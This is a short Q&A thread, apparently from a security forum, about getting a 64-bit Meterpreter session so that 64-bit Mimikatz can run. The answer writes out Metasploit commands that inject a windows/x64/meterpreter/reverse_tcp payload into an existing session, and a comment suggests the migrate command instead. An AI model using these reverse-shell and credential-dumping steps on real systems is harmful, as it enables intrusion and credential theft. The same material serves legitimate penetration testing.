# How do you send a 64 bit meterpreter stager?

Tags: metasploit, meterpreter

All the stagers that are sent seem to be 32 bit. This is fine, until I have to run Mimikatz which on a 64 bit system you NEED to run the 64 bit mimikatz. Since the 64 bit Mimikatz won't run on the 32 bit meterpreter, I'm in need of the 64 bit Meterpreter.

Answer (score 6):

Just use a 64 bit Meterpreter payload.
For example the `windows/x64/meterpreter/reverse_tcp` payload.

You can get a 64 bit shell from a 32 bit shell by using the `payload_inject` module built-in to Metasploit. 
You can do this by running the following commands after you already have a 32 bit Meterpreter shell: `use windows/local/payload_inject 
 set payload windows/x64/meterpreter/reverse_tcp`. 
Then setting the other parameters (SESSION, LHOST, LPORT) to yours. Then you get a 64 bit Meterpreter shell!

Comment: This didnt work for me. Here is the error i got.
[-] Exploit aborted due to failure: bad-config: Cannot inject a 64-bit payload into any process on a 32-bit OS

Comment: But I was able to migrate to a 64 bit process using the migrate command and I got a 64 bit meterpreter.